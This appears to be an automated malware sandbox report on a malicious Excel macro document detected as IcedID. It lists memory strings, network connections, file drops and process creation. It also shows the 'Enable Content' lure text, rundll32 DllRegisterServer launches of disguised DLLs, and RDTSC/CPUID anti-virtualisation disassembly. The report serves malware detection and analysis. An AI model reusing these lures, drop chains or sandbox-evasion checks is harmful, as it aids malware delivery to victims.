Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/vi/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/console/home
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&src=footer-signin-mobile
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://d1.awsstatic.com
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&fmt=gif
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://devices.amazonaws.com?hp=tile&so-exp=below
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp String found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://pages.awscloud.com/AmazonECSAnywherePreview.html?hp=tile&so-exp=below
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2188078366.0000000002A26000.00000004.00000001.sdmp String found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&story=fico
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&story=zllw
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&sc_icampaign=
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2188078366.0000000002A26000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&src=default
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&src=default
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp String found in binary or memory: https://press.aboutamazon.com/press-releases/aws
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://s0.awsstatic.com
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2173075122.0000000000351000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2188078366.0000000002A26000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/awscloud
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp String found in binary or memory: https://www.amazon.jobs/aws
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2188078366.0000000002A26000.00000004.00000001.sdmp String found in binary or memory: https://www.twitch.tv/aws
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2188078366.0000000002A26000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown HTTPS traffic detected: 192.185.48.186:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.185.214.87:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown HTTPS traffic detected: 50.87.146.86:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.79.62.99:443 -> 192.168.2.22:49170 version: TLS 1.2

E-Banking Fraud:

Yara detected IcedID
Source: Yara match File source: 00000003.00000002.2497781112.000000000038E000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2174963879.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2172023641.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2173003375.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2497738687.00000000002E1000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2173701556.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2172513544.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2796, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2540, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please I"' from
Source: Screenshot number: 8 Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
Source: Screenshot number: 8 Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Source: Document image extraction number: 9 Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 9 Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 15 Screenshot OCR: Enable Editing from the yellow bar above CB Once You have Enable Editing, please click Enable Cont
Source: Document image extraction number: 15 Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
Source: Screenshot number: 12 Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
Source: Screenshot number: 12 Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Found Excel 4.0 Macro with suspicious formulas
Source: document-1251000362.xlsm Initial sample: CALL
Source: document-1251000362.xlsm Initial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheet
Source: document-1251000362.xlsm Initial sample: Sheet size: 36917
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd3
Contains functionality to call native functions
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_002313B8 NtQuerySystemInformation,RtlAllocateHeap, 3_2_002313B8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_001413B8 NtQuerySystemInformation,RtlAllocateHeap, 6_2_001413B8
Detected potential crypto function
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00231100 3_2_00231100
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000007FEF4611000 3_2_000007FEF4611000
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000007FEF4611610 3_2_000007FEF4611610
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000007FEF4611979 3_2_000007FEF4611979
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00141100 6_2_00141100
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000007FEF46AF93A 6_2_000007FEF46AF93A
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif A7B8E0DF5276942405D485EB808FA19B24E42D9758CACF1515028122755C2513
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif BF4D7AAF16DD3806DB0C54096EE9CAF23316C2A6C9D1F6ABC55B39215E88F685
Source: Joe Sandbox View Dropped File: C:\Users\user\ksjvoefv.skd A7B8E0DF5276942405D485EB808FA19B24E42D9758CACF1515028122755C2513
Source: Joe Sandbox View Dropped File: C:\Users\user\ksjvoefv.skd3 BF4D7AAF16DD3806DB0C54096EE9CAF23316C2A6C9D1F6ABC55B39215E88F685
Source: rundll32.exe, 00000003.00000002.2497882095.0000000001C90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2171558379.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2179373404.0000000001AD0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSM@11/20@856/6
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$document-1251000362.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC486.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd,DllRegisterServer
Source: document-1251000362.xlsm Metadefender: Detection: 13%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd2,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd3,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd4,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd2,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd3,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd4,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: document-1251000362.xlsm Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: document-1251000362.xlsm Initial sample: OLE zip file path = xl/media/image4.png
Source: document-1251000362.xlsm Initial sample: OLE zip file path = xl/media/image3.png
Source: document-1251000362.xlsm Initial sample: OLE zip file path = xl/media/image1.png
Source: document-1251000362.xlsm Initial sample: OLE zip file path = xl/media/image2.png
Source: document-1251000362.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: document-1251000362.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd3
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd3
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd3

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00231B94 3_2_00231B94
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00141B94 6_2_00141B94
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000000231C52 second address: 0000000000231C73 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [ebp-10h], eax 0x00000018 mov dword ptr [ebp-0Ch], ebx 0x0000001b mov dword ptr [ebp-08h], ecx 0x0000001e mov dword ptr [ebp-04h], edx 0x00000021 rdtsc
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000000231C73 second address: 0000000000231C88 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec ecx 0x0000000a sub eax, eax 0x0000000c dec eax 0x0000000d add edi, eax 0x0000000f call dword ptr [00002428h] 0x00000015 jmp 00007F47E0EA1178h 0x00000017 jmp dword ptr [000925C2h] 0x0000001d dec eax 0x0000001e sub esp, 28h 0x00000021 dec eax 0x00000022 lea ecx, dword ptr [esp+30h] 0x00000026 call dword ptr [00046D21h] 0x0000002c dec eax 0x0000002d mov dword ptr [esp+08h], ecx 0x00000031 dec eax 0x00000032 sub esp, 18h 0x00000035 dec eax 0x00000036 test ecx, ecx 0x00000038 je 00007F47E0EDBE5Dh 0x0000003e dec esp 0x00000040 mov eax, dword ptr [00000030h] 0x00000047 xor eax, eax 0x00000049 dec eax 0x0000004a mov dword ptr [esp+08h], eax 0x0000004e dec ecx 0x0000004f mov edx, dword ptr [eax+000014A0h] 0x00000055 dec eax 0x00000056 mov dword ptr [esp+08h], edx 0x0000005a dec eax 0x0000005b test edx, edx 0x0000005d jne 00007F47E0EBA66Ch 0x00000063 mov eax, C00000BBh 0x00000068 mov dword ptr [esp], eax 0x0000006b jmp 00007F47E0EA1172h 0x0000006d jmp 00007F47E0EA1172h 0x0000006f dec eax 0x00000070 mov dword ptr [ecx], edx 0x00000072 dec eax 0x00000073 add esp, 18h 0x00000076 ret 0x00000077 test eax, eax 0x00000079 jns 00007F47E0EC10DFh 0x0000007f call dword ptr [00046D5Bh] 0x00000085 dec esp 0x00000086 mov edx, ecx 0x00000088 mov eax, 00000043h
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000000231C88 second address: 0000000000231C95 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000000231C95 second address: 0000000000231C52 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a sub eax, ecx 0x0000000c dec esp 0x0000000d add esi, eax 0x0000000f dec ecx 0x00000010 sub edi, 01h 0x00000013 jne 00007F47E0EA1114h 0x00000015 call dword ptr [0000245Eh] 0x0000001b jmp 00007F47E0EA1178h 0x0000001d jmp dword ptr [000925C2h] 0x00000023 dec eax 0x00000024 sub esp, 28h 0x00000027 dec eax 0x00000028 lea ecx, dword ptr [esp+30h] 0x0000002c call dword ptr [00046D21h] 0x00000032 dec eax 0x00000033 mov dword ptr [esp+08h], ecx 0x00000037 dec eax 0x00000038 sub esp, 18h 0x0000003b dec eax 0x0000003c test ecx, ecx 0x0000003e je 00007F47E0EDBE5Dh 0x00000044 dec esp 0x00000046 mov eax, dword ptr [00000030h] 0x0000004d xor eax, eax 0x0000004f dec eax 0x00000050 mov dword ptr [esp+08h], eax 0x00000054 dec ecx 0x00000055 mov edx, dword ptr [eax+000014A0h] 0x0000005b dec eax 0x0000005c mov dword ptr [esp+08h], edx 0x00000060 dec eax 0x00000061 test edx, edx 0x00000063 jne 00007F47E0EBA66Ch 0x00000069 mov eax, C00000BBh 0x0000006e mov dword ptr [esp], eax 0x00000071 jmp 00007F47E0EA1172h 0x00000073 jmp 00007F47E0EA1172h 0x00000075 dec eax 0x00000076 mov dword ptr [ecx], edx 0x00000078 dec eax 0x00000079 add esp, 18h 0x0000007c ret 0x0000007d test eax, eax 0x0000007f jns 00007F47E0EC10DFh 0x00000085 call dword ptr [00046D5Bh] 0x0000008b dec esp 0x0000008c mov edx, ecx 0x0000008e mov eax, 00000043h
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000000141C52 second address: 0000000000141C73 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [ebp-10h], eax 0x00000018 mov dword ptr [ebp-0Ch], ebx 0x0000001b mov dword ptr [ebp-08h], ecx 0x0000001e mov dword ptr [ebp-04h], edx 0x00000021 rdtsc
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000000141C73 second address: 0000000000141C88 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec ecx 0x0000000a sub eax, eax 0x0000000c dec eax 0x0000000d add edi, eax 0x0000000f call dword ptr [00002428h] 0x00000015 jmp 00007F47E0EA1178h 0x00000017 jmp dword ptr [000925C2h] 0x0000001d dec eax 0x0000001e sub esp, 28h 0x00000021 dec eax 0x00000022 lea ecx, dword ptr [esp+30h] 0x00000026 call dword ptr [00046D21h] 0x0000002c dec eax 0x0000002d mov dword ptr [esp+08h], ecx 0x00000031 dec eax 0x00000032 sub esp, 18h 0x00000035 dec eax 0x00000036 test ecx, ecx 0x00000038 je 00007F47E0EDBE5Dh 0x0000003e dec esp 0x00000040 mov eax, dword ptr [00000030h] 0x00000047 xor eax, eax 0x00000049 dec eax 0x0000004a mov dword ptr [esp+08h], eax 0x0000004e dec ecx 0x0000004f mov edx, dword ptr [eax+000014A0h] 0x00000055 dec eax 0x00000056 mov dword ptr [esp+08h], edx 0x0000005a dec eax 0x0000005b test edx, edx 0x0000005d jne 00007F47E0EBA66Ch 0x00000063 mov eax, C00000BBh 0x00000068 mov dword ptr [esp], eax 0x0000006b jmp 00007F47E0EA1172h 0x0000006d jmp 00007F47E0EA1172h 0x0000006f dec eax 0x00000070 mov dword ptr [ecx], edx 0x00000072 dec eax 0x00000073 add esp, 18h 0x00000076 ret 0x00000077 test eax, eax 0x00000079 jns 00007F47E0EC10DFh 0x0000007f call dword ptr [00046D5Bh] 0x00000085 dec esp 0x00000086 mov edx, ecx 0x00000088 mov eax, 00000043h
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000000141C88 second address: 0000000000141C95 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
